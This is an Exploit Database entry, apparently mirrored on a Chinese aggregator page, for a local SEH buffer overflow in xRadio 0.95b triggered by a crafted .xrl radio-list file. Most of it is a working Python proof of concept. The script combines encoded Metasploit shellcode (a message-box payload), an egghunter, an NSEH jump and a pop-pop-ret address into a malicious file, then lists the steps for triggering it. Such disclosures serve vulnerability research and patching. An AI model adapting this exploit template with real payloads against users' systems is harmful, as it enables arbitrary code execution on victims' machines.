xRadio 0.95b – ‘.xrl’ Local Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： b0telh0
  日期： 2011-02-09
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16141/

• GotGeek Labs
  http://www.gotgeek.com.br/
  
  xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
  
  
  
  [+] Description
  
  With xRadio you can listen internet radio with Windows Media Player Technology (tm).
  You can setup a radio list and import asx's files. The program stay on the tray bar.
  
  
  
  [+] Information
  
  Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
  Advisory: gg-001-2011
  Date: 02-08-2011
  Last update: 02-08-2011
  Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt
  Tested on: Windows XP SP3 (VirtualBox)
  
  
  
  [+] Vulnerability
  
  xRadio is affected by stack-based buffer overflow vulnerability because it fails
  to perform adequate boundary checks on user-supplied input.
  Successful exploitation of the vulnerability allows an attacker to execute
  arbitrary code. Other versions are also affected but have a different trigger.
  
  Affected Versions:
  xRadio 0.95b
  xRadio 0.9
  xRadio 0.5
  
  
  
  [+] Proof of Concept/Codes
  
  #!/usr/bin/python
  #
  
  
  #
  # windows/messagebox - 590 bytes
  # x86/alpha_upper
  # http://www.metasploit.com
  #
  shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
  	"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
  	"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
  	"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
  	"\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54"
  	"\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31"
  	"\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54"
  	"\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b"
  	"\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52"
  	"\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50"
  	"\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c"
  	"\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a"
  	"\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50"
  	"\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51"
  	"\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43"
  	"\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b"
  	"\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c"
  	"\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c"
  	"\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43"
  	"\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c"
  	"\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d"
  	"\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c"
  	"\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51"
  	"\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37"
  	"\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b"
  	"\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30"
  	"\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52"
  	"\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a"
  	"\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58"
  	"\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47"
  	"\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b"
  	"\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43"
  	"\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56"
  	"\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b"
  	"\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52"
  	"\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54"
  	"\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c"
  	"\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51"
  	"\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50"
  	"\x55\x43\x38\x41\x41")
  
  junk = "\x41" * 3248
  tag = "\x77\x30\x30\x74\x77\x30\x30\x74"	# w00tw00t
  nops = "\x90" * 230
  
  # Of course we don't need this.. It was just for fun...
  #
  egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
   "\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")	# 32 bytes
  
  nseh = "\xeb\x88\x90\x90"	 # jump back 118 bytes
  seh= "\x82\xe2\x47\x00"	 # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe]
  junk2 = "\x42" * 884
  
  try:
  file = open('b0t.xrl','w');
  file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2);
  file.close();
  print "\n[*] gotgeek labs"
  print "[*] http://gotgeek.com.br\n"
  print "[+] b0t.xrl created."
  print "[+] Open xRadio.exe..."
  print "[+] and Radios >> Edit List >> Save radio list"
  print "[+] Select the *.xrl file, press Yes and boom!!\n"
  except:
  print "\n[-] Error.. Can't write file to system.\n"
  
  
  
  [+] References
  
  http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio
  
  
  
  [+] Credits
  
  b0telh0